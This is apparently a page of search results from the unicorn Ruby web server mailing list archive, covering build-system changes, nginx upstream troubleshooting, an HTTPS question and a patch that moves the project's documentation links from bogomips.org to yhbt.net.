> > Or moving the ragel invocation into the extconf.rb-generated
> > Makefile? (not too sure how to do that...).
> 
> Not really no. And it would make ragel a build dependency.

No, the generated .c file would still be distributed with the
gem as it is today.  I'm absolutely against introducing new
build requirements (optional dependencies, maybe, but not
requirements).

Changing the .rl file might result in ragel running (or emit
warning if ragel isn't installed).  Not too sure how to do that
via mkmf, though...  Or it would just throw a warning and drop a
hint to run "make ragel" at the top-level if the .c file is
missing...
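
Something along those lines in extconf.rb is all I mean -- just a
sketch, nothing like this exists in unicorn today:

    # warn git-checkout users who lack the ragel-generated parser;
    # gem installs ship ext/unicorn_http/unicorn_http.c, so this
    # would never trigger for them
    generated = File.expand_path('unicorn_http.c', __dir__)
    unless File.exist?(generated)
      warn "#{generated} is missing; run `make ragel' at the top level " \
           "(requires ragel) before building from a git checkout"
    end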

> But really I don't think so many people need to use unicorn
> branches.

*shrug*  I figure for any one person that posts a comment for
something on any public forum, there's probably 10 that feel the
same way.

> > OK, soon.  Maybe with just the aforementioned ragel check above;
> > or not even...  
> 
> I'd say not even. It's just for people like me trying to run branches.

Alright, we can experiment with more build system changes
another time (and I zoned out while writing the 5.7
release notes and forgot to note the minor build system changes
I made right after the 5.6.0 release :x)

https://yhbt.net/unicorn-public/20200908084429.GA16521@dcvr/

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  @ 2020-09-03 11:23  3%               ` Jean Boussier
    0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2020-09-03 11:23 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

> Do the current dependencies (kgio, raindrops) export alright, as well?

Yes just fine.

> Might be worth comparing the generated Makefile with other gems
> and see if there's missing flags or such.

I tried that but couldn't figure anything out.

> Also, did things work a few days/weeks ago when ruby.git was still 2.8?

They worked fine, yes.  But I doubt it's caused by the version number;
they must have removed some deprecated stuff at the same time.

> *shrug* my brain hurts from other stuff

No worries. It was just in case it would ring a bell for you.
I'll keep looking and ask for help from colleagues.

^ permalink raw reply	[relevance 3%]

* Re: Connection issues between nginx and unicorn
  @ 2020-08-18 18:06  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-08-18 18:06 UTC (permalink / raw)
  To: Michael Bernstein; +Cc: unicorn-public, Daniel Libanori, Luiz Ferreira

Michael Bernstein <michael.bernstein@clicksign.com> wrote:
> Hello,
> 
> We are having a lot of connection issues between nginx and unicorn,
> but we don't know exactly where the issue is. Can somebody help us?

Sure, replies in line...

> Example from our nginx logs:
> [error] 6#6: *4269348 connect() failed (111: Connection refused) while
> connecting to upstream, client: 10.2.2.252, server: _, request: "POST
> /api/v1/documents?access_token=....
> [error] 6#6: *4269169 recv() failed (104: Connection reset by peer)
> while reading response header from upstream, client: 10.2.10.120,
> server: _, request: "GET /api/v1/documents/.....
> [error] 6#6: *4268896 upstream timed out (110: Operation timed out)
> while connecting to upstream, client: 10.2.2.252, server: _, request:
> "GET /accounts/.... HTTP/1.1", upstream:
> "http://172.20.214.176:80/accounts...", host: "app.clicksign.com",
> referrer: "https://app.clicksign.com/..."

Did any connections ever work?

> ############
> Unicorn configuration file:
> 
> # frozen_string_literal: true
> 
> listen 8080

OK, so that means it's listening to all IP addresses on TCP port 8080;
no problem here.

If you use curl to hit 8080 on the host(s) unicorn is running,
it should work.

> worker_processes 4
> timeout 60
> 
> preload_app true
> GC.respond_to?(:copy_on_write_friendly=) &&
>   (GC.copy_on_write_friendly = true)

Off-topic: copy-on-write-friendly GC is the default in Ruby 2.0+
(and IIRC GC.copy_on_write_friendly= was never in any official Ruby
release, just the Phusion "Enterprise Edition")

<snip>

> ############
> nginx configuration file:
> 
> proxy_cache_path /var/cache/nginx/ levels=1:2 keys_zone=assets_cache:10m
>                  max_size=1g inactive=60m use_temp_path=off;
> 
> resolver kube-dns.kube-system.svc.cluster.local valid=5s;
> 
> upstream backend {
>   server unicorn;

Is "unicorn" an entry in your DNS (via search path) or
an entry in /etc/hosts file?

There's also no reference to port 8080 anywhere in your nginx
config, so I don't know how nginx is supposed to know that
unicorn is on port 8080.

I would expect to see something like:

    server unicorn.internal.example.com:8080;

Or if on the same host:

    server 127.0.0.1:8080;

> }
> 
> server {
>   server_name _;

<snip>

>   location ~* ^/(fonts|webfonts|assets|packs) {
>     proxy_redirect off;
>     proxy_cache assets_cache;
>     proxy_cache_valid 120m;
>     proxy_pass http://backend;
>     add_header Cache-Control public;
>     if ($http_origin ~
> '^((https*?:\/\/).*?((\.clicksign)\.(com|me|dev)))($|\/.*$)$' ){
>       add_header Access-Control-Allow-Origin $http_origin;
>     }
>     expires max;
>   }
> 
>   location / {
>     proxy_pass http://backend;
>     proxy_redirect off;
>     proxy_read_timeout 60;
>     proxy_set_header Host $http_host;
>   }

No references to port 8080 in either location block, either.

I don't think you need 8080 in the location blocks if you have it
in the "upstream backend" block; it's been a while since I've
used nginx... But you need 8080 (and the correct IP address or
DNS entry) somewhere.

^ permalink raw reply	[relevance 2%]

* Re: Can Unicorn utilize HTTPS?
  @ 2020-08-06 21:54  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-08-06 21:54 UTC (permalink / raw)
  To: Keven Sticher; +Cc: unicorn-public

Keven Sticher <ksticher@gmail.com> wrote:
> Going through some internal debate, and if end to end encryption is required through all layers, does Unicorn handle TLS, SSL, HTTPS?

Nope.  It's only intended to talk to nginx over a Unix domain
socket on the same host, or nginx on a fast private LAN.  Having
something like varnish or haproxy in between nginx and unicorn
is fine, too, but they must either be on the same host or fast
LAN.

It fails horribly (by design :>) when talking to the open Internet
or any high-latency clients.
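
So TLS would terminate at nginx; unicorn itself only needs something
like this minimal sketch (the socket path is made up), with nginx
handling HTTPS and proxying to that socket:

    # unicorn.conf.rb -- sketch; nginx terminates TLS and proxies here
    listen "/run/unicorn/app.sock"  # same-host Unix domain socket
    worker_processes 4
    timeout 60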

> Thank you for your response.

no problem :>

^ permalink raw reply	[relevance 4%]

* [PATCH] doc: s/bogomips.org/yhbt.net/g
  @ 2020-01-14  7:46  1% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-01-14  7:46 UTC (permalink / raw)
  To: unicorn-public

bogomips.org is due to expire, soon, and I'm not willing to pay
extortionist fees to Ethos Capital/PIR/ICANN to keep a .org.  So
it's at yhbt.net, for now, but it will change again to
whatever's affordable...  Identity is overrated.

Tor users can use .onions and kick ICANN to the curb:

	torsocks w3m http://unicorn.ou63pmih66umazou.onion/
	torsocks git clone http://ou63pmih66umazou.onion/unicorn.git/
	torsocks w3m http://ou63pmih66umazou.onion/unicorn-public/

While we're at it, `s/news.gmane.org/news.gmane.io/g', too.
(but I suspect that'll need to be resynched since our mail
"List-Id:" header is changing).
---
 .olddoc.yml                      | 19 ++++++++++++-------
 Documentation/unicorn.1          |  8 ++++----
 Documentation/unicorn_rails.1    |  8 ++++----
 FAQ                              |  2 +-
 GNUmakefile                      |  4 ++--
 HACKING                          |  2 +-
 ISSUES                           | 24 ++++++++++++------------
 KNOWN_ISSUES                     |  4 ++--
 Links                            | 10 +++++-----
 README                           | 12 ++++++------
 SIGNALS                          |  2 +-
 Sandbox                          |  4 ++--
 archive/slrnpull.conf            |  2 +-
 examples/big_app_gc.rb           |  2 +-
 examples/logrotate.conf          |  4 ++--
 examples/nginx.conf              |  2 +-
 examples/unicorn.conf.minimal.rb |  4 ++--
 examples/unicorn.conf.rb         |  4 ++--
 ext/unicorn_http/unicorn_http.rl |  2 +-
 lib/unicorn.rb                   |  2 +-
 lib/unicorn/configurator.rb      |  6 +++---
 lib/unicorn/http_server.rb       |  2 +-
 lib/unicorn/oob_gc.rb            |  4 ++--
 unicorn.gemspec                  |  4 ++--
 24 files changed, 71 insertions(+), 66 deletions(-)

diff --git a/.olddoc.yml b/.olddoc.yml
index d2d340f..0609bdb 100644
--- a/.olddoc.yml
+++ b/.olddoc.yml
@@ -1,8 +1,9 @@
 ---
-cgit_url: https://bogomips.org/unicorn.git
-git_url: https://bogomips.org/unicorn.git
-rdoc_url: https://bogomips.org/unicorn/
-ml_url: https://bogomips.org/unicorn-public/
+cgit_url: https://yhbt.net/unicorn.git
+rdoc_url: https://yhbt.net/unicorn/
+ml_url:
+- https://yhbt.net/unicorn-public/
+- http://ou63pmih66umazou.onion/unicorn-public/
 merge_html:
   unicorn_1: Documentation/unicorn.1.html
   unicorn_rails_1: Documentation/unicorn_rails.1.html
@@ -11,7 +12,11 @@ noindex:
 - LATEST
 - TODO
 - unicorn_rails_1
-public_email: unicorn-public@bogomips.org
+public_email: unicorn-public@yhbt.net
 nntp_url:
-  - nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
-  - nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
+- nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
+- nntp://ou63pmih66umazou.onion/inbox.comp.lang.ruby.unicorn
+- nntp://news.gmane.io/gmane.comp.lang.ruby.unicorn.general
+source_code:
+- git clone https://yhbt.net/unicorn.git
+- torsocks git clone http://ou63pmih66umazou.onion/unicorn.git
diff --git a/Documentation/unicorn.1 b/Documentation/unicorn.1
index 3f8cb96..d76d40f 100644
--- a/Documentation/unicorn.1
+++ b/Documentation/unicorn.1
@@ -154,7 +154,7 @@ TTIN \- increment the number of worker processes by one
 .IP \[bu] 2
 TTOU \- decrement the number of worker processes by one
 .PP
-See the SIGNALS (https://bogomips.org/unicorn/SIGNALS.html) document for
+See the SIGNALS (https://yhbt.net/unicorn/SIGNALS.html) document for
 full description of all signals used by Unicorn.
 .SH RACK ENVIRONMENT
 .PP
@@ -204,11 +204,11 @@ the unicorn config file.
 \f[I]Rack::Builder\f[] ri/RDoc
 .IP \[bu] 2
 \f[I]Unicorn::Configurator\f[] ri/RDoc
-.UR https://bogomips.org/unicorn/Unicorn/Configurator.html
+.UR https://yhbt.net/unicorn/Unicorn/Configurator.html
 .UE
 .IP \[bu] 2
 unicorn RDoc
-.UR https://bogomips.org/unicorn/
+.UR https://yhbt.net/unicorn/
 .UE
 .IP \[bu] 2
 Rack RDoc
@@ -219,4 +219,4 @@ Rackup HowTo
 .UR https://github.com/rack/rack/wiki/(tutorial)-rackup-howto
 .UE
 .SH AUTHORS
-The Unicorn Community <unicorn-public@bogomips.org>.
+The Unicorn Community <unicorn-public@yhbt.net>.
diff --git a/Documentation/unicorn_rails.1 b/Documentation/unicorn_rails.1
index 71c80be..fec0a2a 100644
--- a/Documentation/unicorn_rails.1
+++ b/Documentation/unicorn_rails.1
@@ -180,7 +180,7 @@ TTIN \- increment the number of worker processes by one
 .IP \[bu] 2
 TTOU \- decrement the number of worker processes by one
 .PP
-See the SIGNALS (https://bogomips.org/unicorn/SIGNALS.html) document for
+See the SIGNALS (https://yhbt.net/unicorn/SIGNALS.html) document for
 full description of all signals used by Unicorn.
 .SH SEE ALSO
 .IP \[bu] 2
@@ -189,11 +189,11 @@ unicorn(1)
 \f[I]Rack::Builder\f[] ri/RDoc
 .IP \[bu] 2
 \f[I]Unicorn::Configurator\f[] ri/RDoc
-.UR https://bogomips.org/unicorn/Unicorn/Configurator.html
+.UR https://yhbt.net/unicorn/Unicorn/Configurator.html
 .UE
 .IP \[bu] 2
 unicorn RDoc
-.UR https://bogomips.org/unicorn/
+.UR https://yhbt.net/unicorn/
 .UE
 .IP \[bu] 2
 Rack RDoc
@@ -204,4 +204,4 @@ Rackup HowTo
 .UR https://github.com/rack/rack/wiki/(tutorial)-rackup-howto
 .UE
 .SH AUTHORS
-The Unicorn Community <unicorn-public@bogomips.org>.
+The Unicorn Community <unicorn-public@yhbt.net>.
diff --git a/FAQ b/FAQ
index 4ae2034..018ca92 100644
--- a/FAQ
+++ b/FAQ
@@ -7,7 +7,7 @@ drained entirely by the application.  This may happen when request
 bodies are gzipped, as unicorn reads request body data lazily to avoid
 overhead from bad requests.
 
-Ref: https://bogomips.org/unicorn-public/FC91211E-FD32-432C-92FC-0318714C2170@zendesk.com/
+Ref: https://yhbt.net/unicorn-public/FC91211E-FD32-432C-92FC-0318714C2170@zendesk.com/
 
 === Why aren't my Rails log files rotated when I use SIGUSR1?
 
diff --git a/GNUmakefile b/GNUmakefile
index 94c46ee..eac3473 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -193,13 +193,13 @@ doc: .document $(ext)/unicorn_http.c man html .olddoc.yml $(PLACEHOLDERS)
 	install -m644 $(man1_paths) doc/
 	tar cf - $$(git ls-files examples/) | (cd doc && tar xf -)
 
-# publishes docs to https://bogomips.org/unicorn/
+# publishes docs to https://yhbt.net/unicorn/
 publish_doc:
 	-git set-file-times
 	$(MAKE) doc
 	$(MAKE) doc_gz
 	chmod 644 $$(find doc -type f)
-	$(RSYNC) -av doc/ bogomips.org:/srv/bogomips/unicorn/
+	$(RSYNC) -av doc/ yhbt.net:/srv/yhbt/unicorn/
 	git ls-files | xargs touch
 
 # Create gzip variants of the same timestamp as the original so nginx
diff --git a/HACKING b/HACKING
index be1bb85..976bf92 100644
--- a/HACKING
+++ b/HACKING
@@ -57,7 +57,7 @@ Please wrap documentation at 72 characters-per-line or less (long URLs
 are exempt) so it is comfortably readable from terminals.
 
 When referencing mailing list posts, use
-<tt>https://bogomips.org/unicorn-public/$MESSAGE_ID/</tt> if possible
+<tt>https://yhbt.net/unicorn-public/$MESSAGE_ID/</tt> if possible
 since the Message-ID remains searchable even if a particular site
 becomes unavailable.
 
diff --git a/ISSUES b/ISSUES
index 473da2f..d11dc56 100644
--- a/ISSUES
+++ b/ISSUES
@@ -1,9 +1,9 @@
 = Issues
 
-mailto:unicorn-public@bogomips.org is the best place to report bugs,
+mailto:unicorn-public@yhbt.net is the best place to report bugs,
 submit patches and/or obtain support after you have searched the
-{email archives}[https://bogomips.org/unicorn-public/] and
-{documentation}[https://bogomips.org/unicorn/].
+{email archives}[https://yhbt.net/unicorn-public/] and
+{documentation}[https://yhbt.net/unicorn/].
 
 * No subscription will ever be required to email us
 * Cc: all participants in a thread or commit, as subscription is optional
@@ -12,12 +12,12 @@ submit patches and/or obtain support after you have searched the
 * Do not send HTML mail or images,
   they hurt reader privacy and will be flagged as spam
 * Anonymous and pseudonymous messages will ALWAYS be welcome
-* The email submission port (587) is enabled on the bogomips.org MX:
-  https://bogomips.org/unicorn-public/20141004232241.GA23908@dcvr.yhbt.net/t/
+* The email submission port (587) is enabled on the yhbt.net MX:
+  https://yhbt.net/unicorn-public/20141004232241.GA23908@dcvr.yhbt.net/t/
 
 We will never have a centralized or formal bug tracker.  Instead we
 can interoperate with any bug tracker which can Cc: us plain-text to
-mailto:unicorn-public@bogomips.org   This includes the Debian BTS
+mailto:unicorn-public@yhbt.net   This includes the Debian BTS
 at https://bugs.debian.org/unicorn and possibly others.
 
 If your issue is of a sensitive nature or you're just shy in public,
@@ -73,10 +73,10 @@ document distributed with git) on guidelines for patch submission.
 
 == Contact Info
 
-* public: mailto:unicorn-public@bogomips.org
-* nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
+* public: mailto:unicorn-public@yhbt.net
+* nntp://news.gmane.io/gmane.comp.lang.ruby.unicorn.general
 * nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
-* https://bogomips.org/unicorn-public/
+* https://yhbt.net/unicorn-public/
 * http://ou63pmih66umazou.onion/unicorn-public/
 
 Mailing list subscription is optional, so Cc: all participants.
@@ -84,13 +84,13 @@ Mailing list subscription is optional, so Cc: all participants.
 You can follow along via NNTP (read-only):
 
 	nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
-	nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
+	nntp://news.gmane.io/gmane.comp.lang.ruby.unicorn.general
 
 Or Atom feeds:
 
-	https://bogomips.org/unicorn-public/new.atom
+	https://yhbt.net/unicorn-public/new.atom
 	http://ou63pmih66umazou.onion/unicorn-public/new.atom
 
-	The HTML archives at https://bogomips.org/unicorn-public/
+	The HTML archives at https://yhbt.net/unicorn-public/
 	also has links to per-thread Atom feeds and downloadable
 	mboxes.
diff --git a/KNOWN_ISSUES b/KNOWN_ISSUES
index ebd4822..0017f20 100644
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -9,7 +9,7 @@ acceptable solution.  Those issues are documented here.
   handlers.
 
 * Issues with FreeBSD jails can be worked around as documented by Tatsuya Ono:
-  https://bogomips.org/unicorn-public/CAHBuKRj09FdxAgzsefJWotexw-7JYZGJMtgUp_dhjPz9VbKD6Q@mail.gmail.com/
+  https://yhbt.net/unicorn-public/CAHBuKRj09FdxAgzsefJWotexw-7JYZGJMtgUp_dhjPz9VbKD6Q@mail.gmail.com/
 
 * PRNGs (pseudo-random number generators) loaded before forking
   (e.g. "preload_app true") may need to have their internal state
@@ -60,7 +60,7 @@ acceptable solution.  Those issues are documented here.
   application to use Rails 2.3.2 and you have no other choice, then
   you may edit your unicorn gemspec and remove the Rack dependency.
 
-  ref: https://bogomips.org/unicorn-public/20091014221552.GA30624@dcvr.yhbt.net/
+  ref: https://yhbt.net/unicorn-public/20091014221552.GA30624@dcvr.yhbt.net/
   Note: the workaround described in the article above only made
   the issue more subtle and we didn't notice them immediately.
 
diff --git a/Links b/Links
index 10551a6..f81142d 100644
--- a/Links
+++ b/Links
@@ -2,7 +2,7 @@
 
 If you're interested in unicorn, you may be interested in some of the projects
 listed below.  If you have any links to add/change/remove, please tell us at
-mailto:unicorn-public@bogomips.org!
+mailto:unicorn-public@yhbt.net!
 
 == Disclaimer
 
@@ -23,10 +23,10 @@ or services behind them.
 * {golden_brindle}[https://github.com/simonoff/golden_brindle] - tool to
   manage multiple unicorn instances/applications on a single server
 
-* {raindrops}[https://bogomips.org/raindrops/] - real-time stats for
+* {raindrops}[https://yhbt.net/raindrops/] - real-time stats for
   preforking Rack servers
 
-* {UnXF}[https://bogomips.org/unxf/]  Un-X-Forward* the Rack environment,
+* {UnXF}[https://yhbt.net/unxf/]  Un-X-Forward* the Rack environment,
   useful since unicorn is designed to be deployed behind a reverse proxy.
 
 === unicorn is written to work with
@@ -52,7 +52,7 @@ or services behind them.
 * {Mongrel}[https://rubygems.org/gems/mongrel] - the awesome webserver
   unicorn is based on.  A historical archive of the mongrel dev list
   featuring early discussions of unicorn is available at:
-  https://bogomips.org/mongrel-devel/
+  https://yhbt.net/mongrel-devel/
 
-* {david}[https://bogomips.org/david.git] - a tool to explain why you need
+* {david}[https://yhbt.net/david.git] - a tool to explain why you need
   nginx in front of unicorn
diff --git a/README b/README
index 89467fc..0e95f48 100644
--- a/README
+++ b/README
@@ -80,12 +80,12 @@ You may install it via RubyGems on RubyGems.org:
 You can get the latest source via git from the following locations
 (these versions may not be stable):
 
-  https://bogomips.org/unicorn.git
+  https://yhbt.net/unicorn.git
   https://repo.or.cz/unicorn.git (mirror)
 
 You may browse the code from the web:
 
-* https://bogomips.org/unicorn.git
+* https://yhbt.net/unicorn.git
 * https://repo.or.cz/w/unicorn.git (gitweb)
 
 See the HACKING guide on how to contribute and build prerelease gems
@@ -133,13 +133,13 @@ and libraries which run on top of it.
 
 All feedback (bug reports, user/development dicussion, patches, pull
 requests) go to the mailing list/newsgroup.  See the ISSUES document for
-information on the {mailing list}[mailto:unicorn-public@bogomips.org].
+information on the {mailing list}[mailto:unicorn-public@yhbt.net].
 
-The mailing list is archived at https://bogomips.org/unicorn-public/
+The mailing list is archived at https://yhbt.net/unicorn-public/
 Read-only NNTP access is available at:
 nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn and
-nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
+nntp://news.gmane.io/gmane.comp.lang.ruby.unicorn.general
 
 For the latest on unicorn releases, you may also finger us at
-unicorn@bogomips.org or check our NEWS page (and subscribe to our Atom
+unicorn@yhbt.net or check our NEWS page (and subscribe to our Atom
 feed).
diff --git a/SIGNALS b/SIGNALS
index 1af851d..7321f2b 100644
--- a/SIGNALS
+++ b/SIGNALS
@@ -8,7 +8,7 @@ should be possible to easily share process management scripts between
 Unicorn and nginx.
 
 One example init script is distributed with unicorn:
-https://bogomips.org/unicorn/examples/init.sh
+https://yhbt.net/unicorn/examples/init.sh
 
 === Master Process
 
diff --git a/Sandbox b/Sandbox
index d0f915e..651e5cd 100644
--- a/Sandbox
+++ b/Sandbox
@@ -34,7 +34,7 @@ is the primary issue with sandboxing tools such as Bundler and Isolate.
 If you're bundling unicorn, use "bundle exec unicorn" (or "bundle exec
 unicorn_rails") to start unicorn with the correct environment variables
 
-ref: https://bogomips.org/unicorn-public/9ECF07C4-5216-47BE-961D-AFC0F0C82060@internetfamo.us/
+ref: https://yhbt.net/unicorn-public/9ECF07C4-5216-47BE-961D-AFC0F0C82060@internetfamo.us/
 
 Otherwise (if you choose to not sandbox your unicorn installation), we
 expect the tips for Isolate (below) apply, too.
@@ -44,7 +44,7 @@ expect the tips for Isolate (below) apply, too.
 This is no longer be an issue as of bundler 0.9.17
 
 ref:
-https://bogomips.org/unicorn-public/8FC34B23-5994-41CC-B5AF-7198EF06909E@tramchase.com/
+https://yhbt.net/unicorn-public/8FC34B23-5994-41CC-B5AF-7198EF06909E@tramchase.com/
 
 === BUNDLE_GEMFILE for Capistrano users
 
diff --git a/archive/slrnpull.conf b/archive/slrnpull.conf
index fcfcafe..fd04f97 100644
--- a/archive/slrnpull.conf
+++ b/archive/slrnpull.conf
@@ -1,4 +1,4 @@
 # group_name                         max        expire     headers_only
 gmane.comp.lang.ruby.unicorn.general 1000000000 1000000000 0
 
-# usage: slrnpull -d $PWD -h news.gmane.org --no-post
+# usage: slrnpull -d $PWD -h news.gmane.io --no-post
diff --git a/examples/big_app_gc.rb b/examples/big_app_gc.rb
index 9d05719..c1bae10 100644
--- a/examples/big_app_gc.rb
+++ b/examples/big_app_gc.rb
@@ -1,2 +1,2 @@
-# see {Unicorn::OobGC}[https://bogomips.org/unicorn/Unicorn/OobGC.html]
+# see {Unicorn::OobGC}[https://yhbt.net/unicorn/Unicorn/OobGC.html]
 # Unicorn::OobGC was broken in Unicorn v3.3.1 - v3.6.1 and fixed in v3.6.2
diff --git a/examples/logrotate.conf b/examples/logrotate.conf
index 77a01b5..c3aa40d 100644
--- a/examples/logrotate.conf
+++ b/examples/logrotate.conf
@@ -5,7 +5,7 @@
 #    https://linux.die.net/man/8/logrotate
 #
 # public logrotate-related discussion in our archives:
-#    https://bogomips.org/unicorn-public/?q=logrotate
+#    https://yhbt.net/unicorn-public/?q=logrotate
 
 # Modify the following glob to match the logfiles your app writes to:
 /var/log/unicorn_app/*.log {
@@ -33,7 +33,7 @@
 		systemctl kill -s SIGUSR1 unicorn@2.service
 
 		# Examples for other process management systems appreciated
-		# Mail us at unicorn-public@bogomips.org
+		# Mail us at unicorn-public@yhbt.net
 		# (see above for archives)
 
 		# If you use a pid file and assuming your pid file
diff --git a/examples/nginx.conf b/examples/nginx.conf
index b6b69c1..c5026f9 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -113,7 +113,7 @@ http {
     # try_files directive appeared in in nginx 0.7.27 and has stabilized
     # over time.  Older versions of nginx (e.g. 0.6.x) requires
     # "if (!-f $request_filename)" which was less efficient:
-    # https://bogomips.org/unicorn.git/tree/examples/nginx.conf?id=v3.3.1#n127
+    # https://yhbt.net/unicorn.git/tree/examples/nginx.conf?id=v3.3.1#n127
     try_files $uri/index.html $uri.html $uri @app;
 
     location @app {
diff --git a/examples/unicorn.conf.minimal.rb b/examples/unicorn.conf.minimal.rb
index 2d1bf0a..46fd634 100644
--- a/examples/unicorn.conf.minimal.rb
+++ b/examples/unicorn.conf.minimal.rb
@@ -1,9 +1,9 @@
 # Minimal sample configuration file for Unicorn (not Rack) when used
 # with daemonization (unicorn -D) started in your working directory.
 #
-# See https://bogomips.org/unicorn/Unicorn/Configurator.html for complete
+# See https://yhbt.net/unicorn/Unicorn/Configurator.html for complete
 # documentation.
-# See also https://bogomips.org/unicorn/examples/unicorn.conf.rb for
+# See also https://yhbt.net/unicorn/examples/unicorn.conf.rb for
 # a more verbose configuration using more features.
 
 listen 2007 # by default Unicorn listens on port 8080
diff --git a/examples/unicorn.conf.rb b/examples/unicorn.conf.rb
index d2897ef..d90bdc4 100644
--- a/examples/unicorn.conf.rb
+++ b/examples/unicorn.conf.rb
@@ -2,10 +2,10 @@
 #
 # This configuration file documents many features of Unicorn
 # that may not be needed for some applications. See
-# https://bogomips.org/unicorn/examples/unicorn.conf.minimal.rb
+# https://yhbt.net/unicorn/examples/unicorn.conf.minimal.rb
 # for a much simpler configuration file.
 #
-# See https://bogomips.org/unicorn/Unicorn/Configurator.html for complete
+# See https://yhbt.net/unicorn/Unicorn/Configurator.html for complete
 # documentation.
 
 # Use at least one worker per core if you're on a dedicated server,
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index 8ef23bc..dfe3a63 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -487,7 +487,7 @@ static void set_url_scheme(VALUE env, VALUE *server_port)
      * and X-Forwarded-Proto handling from this parser?  We've had it
      * forever and nobody has said anything against it, either.
      * Anyways, please send comments to our public mailing list:
-     * unicorn-public@bogomips.org (no HTML mail, no subscription necessary)
+     * unicorn-public@yhbt.net (no HTML mail, no subscription necessary)
      */
     scheme = rb_hash_aref(env, g_http_x_forwarded_ssl);
     if (!NIL_P(scheme) && STR_CSTR_EQ(scheme, "on")) {
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index dd5dff4..d5991fe 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -96,7 +96,7 @@ def self.builder(ru, op)
 
   # returns an array of strings representing TCP listen socket addresses
   # and Unix domain socket paths.  This is useful for use with
-  # Raindrops::Middleware under Linux: https://bogomips.org/raindrops/
+  # Raindrops::Middleware under Linux: https://yhbt.net/raindrops/
   def self.listener_names
     Unicorn::HttpServer::LISTENERS.map do |io|
       Unicorn::SocketHelper.sock_name(io)
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index e8b76f5..c3a4f2d 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -3,11 +3,11 @@
 
 # Implements a simple DSL for configuring a unicorn server.
 #
-# See https://bogomips.org/unicorn/examples/unicorn.conf.rb and
-# https://bogomips.org/unicorn/examples/unicorn.conf.minimal.rb
+# See https://yhbt.net/unicorn/examples/unicorn.conf.rb and
+# https://yhbt.net/unicorn/examples/unicorn.conf.minimal.rb
 # example configuration files.  An example config file for use with
 # nginx is also available at
-# https://bogomips.org/unicorn/examples/nginx.conf
+# https://yhbt.net/unicorn/examples/nginx.conf
 #
 # See the link:/TUNING.html document for more information on tuning unicorn.
 class Unicorn::Configurator
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 5334fa0..a52931a 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -6,7 +6,7 @@
 # forked worker children.
 #
 # Users do not need to know the internals of this class, but reading the
-# {source}[https://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb]
+# {source}[https://yhbt.net/unicorn.git/tree/lib/unicorn/http_server.rb]
 # is education for programmers wishing to learn how unicorn works.
 # See Unicorn::Configurator for information on how to configure unicorn.
 class Unicorn::HttpServer
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index c4741a0..3b2f488 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -43,8 +43,8 @@
 #     use Unicorn::OobGC, 2, %r{\A/(?:expensive/foo|more_expensive/foo)}
 #
 # Feedback from users of early implementations of this module:
-# * https://bogomips.org/unicorn-public/0BFC98E9-072B-47EE-9A70-05478C20141B@lukemelia.com/
-# * https://bogomips.org/unicorn-public/AANLkTilUbgdyDv9W1bi-s_W6kq9sOhWfmuYkKLoKGOLj@mail.gmail.com/
+# * https://yhbt.net/unicorn-public/0BFC98E9-072B-47EE-9A70-05478C20141B@lukemelia.com/
+# * https://yhbt.net/unicorn-public/AANLkTilUbgdyDv9W1bi-s_W6kq9sOhWfmuYkKLoKGOLj@mail.gmail.com/
 
 module Unicorn::OobGC
 
diff --git a/unicorn.gemspec b/unicorn.gemspec
index ceea831..a189f8d 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -15,14 +15,14 @@
   s.authors = ['unicorn hackers']
   s.summary = 'Rack HTTP server for fast clients and Unix'
   s.description = File.read('README').split("\n\n")[1]
-  s.email = %q{unicorn-public@bogomips.org}
+  s.email = %q{unicorn-public@yhbt.net}
   s.executables = %w(unicorn unicorn_rails)
   s.extensions = %w(ext/unicorn_http/extconf.rb)
   s.extra_rdoc_files = IO.readlines('.document').map!(&:chomp!).keep_if do |f|
     File.exist?(f)
   end
   s.files = manifest
-  s.homepage = 'https://bogomips.org/unicorn/'
+  s.homepage = 'https://yhbt.net/unicorn/'
   s.test_files = test_files
 
   # technically we need ">= 1.9.3", too, but avoid the array here since

^ permalink raw reply related	[relevance 1%]

* Re: Traffic priority with Unicorn
  2019-12-17  5:12  0% ` Eric Wong
@ 2019-12-18 22:06  0%   ` Bertrand Paquet
  0 siblings, 0 replies; 200+ results
From: Bertrand Paquet @ 2019-12-18 22:06 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On Tue, 17 Dec 2019 at 06:12, Eric Wong <bofh@yhbt.net> wrote:
>
> Bertrand Paquet <bertrand.paquet@doctolib.com> wrote:
> > Hello,
> >
> > I would like to introduce some traffic priority in Unicorn. The goal
> > is to keep critical endpoints online even if the application is
> > slowing down a lot.
> >
